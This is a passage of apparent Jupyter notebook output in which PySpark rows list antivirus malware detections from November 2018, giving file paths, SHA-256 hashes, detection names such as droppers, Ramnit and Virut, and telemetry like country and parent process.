  Row(detection=Row(filename='eb8f40f6ae2bed7c96b26378e7eb0e1306b068b1b6e2ca2308c805920bb0bc81', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EB8F40F6AE2BED7C96B26378E7EB0E1306B068B1B6E2CA2308C805920BB0BC81', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eb8f40f6ae2bed7c96b26378e7eb0e1306b068b1b6e2ca2308c805920bb0bc81', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:04:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d0ae3491366ee593fa7ffcec7f3a797e697cc74b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\d0ae3491366ee593fa7ffcec7f3a797e697cc74b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='f89611716c01907a86c0d5dcbd79671793d15e2562d0d27dd6e3c765d32fe6de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:56:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename="inv_159436263_from_kunde, d'amore and doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filepath="Inv_159436263_from_Kunde, D'Amore and Doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filesize=64000, name='TR/Dldr.Upatre.SN.#M0.#R0'), hash='ff176cdf9d3ab8f5f26c86f1da545ff3608187001ecbb3225703823e8a9d4722', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:46:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F0A1E4268E7C9B23965776C74E1128AB68A5BD3A17084034255A67061438D61F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:31:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zipdll.dll', filepath='D:\\DROPSCRIPTV1.8\\EDITOR GAMBAR ( RENAME, WATERMARK, DLL )\\FSViewer64\\ZipDll.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='fd43055f378b3429f3ce0903e2e20d23b0cfb3d7bf4c2bd0bb19e337070c8ba3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:43:55Z'), dt=datetime.date(2018, 11, 1))]]
In [61]:
df.rdd.getNumPartitions()
Out[61]:
100
In [62]:
df = spark.read.json(path)
In [63]:
df = df.coalesce(10)
In [64]:
df.rdd.glom().collect()
Out[64]:
[[Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='00a3c546e50bcc946116950568bae407695fab708ed30c3bc73da15e28374224', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:15:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='00a3c546e50bcc946116950568bae407695fab708ed30c3bc73da15e28374224', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074353-ee08c0f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c67b8277\\AVSCAN-20181031-082733-6D1FD0D0\\AVSCAN-20181102-074353-EE08C0F5', filesize=512000, name='PUA/FusionCore.Gen7.#M1.#R1'), hash='00eb83e0c976d7e8269c5e42ea02793dc98a4d07755dfe27a3c21c0a584418b8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:44:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='noteicon.exe', filepath='C:\\Program Files\\IObit\\IObit Uninstaller\\NoteIcon.exe', filesize=116000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='0121252491e1b22093a267ad3ccb52b8ffcd503dc00e8b0019523f4e131da1a6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:X+1CA+x1IEK3+J7X.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T22:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='11ado0pcs.exe', filepath='C:\\Program Files\\11ADO0PCST\\11ADO0PCS.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v0odf6ppq.exe', filepath='C:\\Program Files\\V0ODF6PPQX\\V0ODF6PPQ.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ft3c7kos0.exe', filepath='C:\\Program Files\\V08BZHM77U\\FT3C7KOS0.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xodvql7dc.exe', filepath='C:\\Program Files\\XODVQL7DCT\\XODVQL7DC.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xupobmmfb.exe', filepath='C:\\Program Files\\T9ZMWGI9OS\\XUPOBMMFB.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wvj9celk8.exe', filepath='C:\\Program Files\\WVJ9CELK8X\\WVJ9CELK8.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xupobmmfb.exe', filepath='C:\\Program Files\\T9ZMWGI9OS\\XUPOBMMFB.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='023faac054424b9d83b16bd9b9942fa4c2c02df860fb39fd770473a46b900ec8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-36.categorizing\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T11:11:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninst.exe', filepath='C:\\Users\\X\\Desktop\\MY BACK UP\\PERSONAL\\BACK UP FROM GERICOM\\TRANSFER 2\\SETUP (E)(web camera)\\vp\\uninst.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='02d74c4c39c365bab234698a38aa2ec83e0628752b63030dbc179d6222607c1b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:12:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205208-25eadf29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-205208-25EADF29', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='0303f6a8f595004c1d07d61cc3f7aad928b84be3d46c0aec7e6163ef718a34ce', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:52:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204741-f754bd98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-204741-F754BD98', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='0303f6a8f595004c1d07d61cc3f7aad928b84be3d46c0aec7e6163ef718a34ce', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:47:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ppj2dd.exe', filepath='\\?\\N:\\Game_Coll\\الشرطة\\PPJ2DD.EXE', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='0333f7f74d900b0c01d40f3b7accc9b05d119a0a4bf29382ff6e20d63f30a652', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:55:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diffupdater.exe', filepath='C:\\Program Files\\Canon\\Auto Update Service\\DiffUpdater.exe', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='035ae9c78f8b49cfda986c1a83d5f42f3f9efcf0c3c2559a91c2b778668f2d20', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:HwQ6bAXSE0CSliYn.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=80048, timestamp='2018-11-02T06:50:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m3.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M3\\M3.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='0369bd1cee65b85446c42b78907b158bf524d02ce48f67dd47c35a8347ab8707', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083334-514ae521', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3ca1d49\\AVSCAN-20181102-083309-4D010CC2\\AVSCAN-20181102-083334-514AE521', filesize=1408000, name='W97M/Agent.4231.#M1.#R1'), hash='0404e94fb8da402743222554e04c0ee17b27badb88f94f144b8935317e587f97', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hosts-bg.exe', filepath='\\\\?\\C:\\program files (x86)\\hosts\\hosts-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:27:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft-windows-s..oxgames-minesweeper_31bf3856ad364e35_6.1.7600.16385_none_fe560f0352e04f48\\MineSweeper.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R7331'), hash='04768c1bf5790790728ee3c6379ca9511c3dfc98a6421dd8fa8e8314d7c1da77', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gminesweeper.exe', filepath='\\\\?\\C:\\Program Files\\Microsoft Games\\Minesweeper\\gMineSweeper.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R7331'), hash='04768c1bf5790790728ee3c6379ca9511c3dfc98a6421dd8fa8e8314d7c1da77', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:11:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ktfdrm_ucc.dll', filepath='C:\\Program Files (x86)\\Samsung\\Samsung New PC Studio\\KTFDRM_UCC.dll', filesize=512000, name='W32/Nimnul.D.#M1.#R1'), hash='0479b46fd31c057040a06223d37efe907f1440979dd465e2fbd8bed6d374e803', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T07:09:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195031-a800432a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72dc1bd4\\AVSCAN-20181102-193726-2CE94C7E\\AVSCAN-20181102-195031-A800432A', filesize=112000, name='TR/Rootkit.gblof.#M1.#R1'), hash='048214aef2e61c56c1d0e226c964001505d6150bf763d02d1af36683ba367495', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hotring_furio_night.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\hotring_furio_night\\hotring_furio_night.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='056c0d34060e60a6dde86d63d3dd304b135fabc7ee57bb839c6c388c9325fa16', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195503-7cae06df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_542b38a0\\AVSCAN-20181102-195436-78F1B2EB\\AVSCAN-20181102-195503-7CAE06DF', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183816-10504ead', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183800-0DC3154C\\AVSCAN-20181102-183816-10504EAD', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='H:\\مجلد جديد (2)\\Windows.10.Manager.2.3.6.www.download.ir\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904304, timestamp='2018-11-02T17:54:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183800-0db80be5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-183752-0C76AA10\\AVSCAN-20181102-183800-0DB80BE5', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183710-0588562b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183700-03DFF39F\\AVSCAN-20181102-183710-0588562B', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183810-0f6d0d1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183800-0DC3154C\\AVSCAN-20181102-183810-0F6D0D1F', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183758-0d7ba6b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-183752-0C76AA10\\AVSCAN-20181102-183758-0D7BA6B9', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:55Z'), dt=datetime.date(2018, 11, 2)),
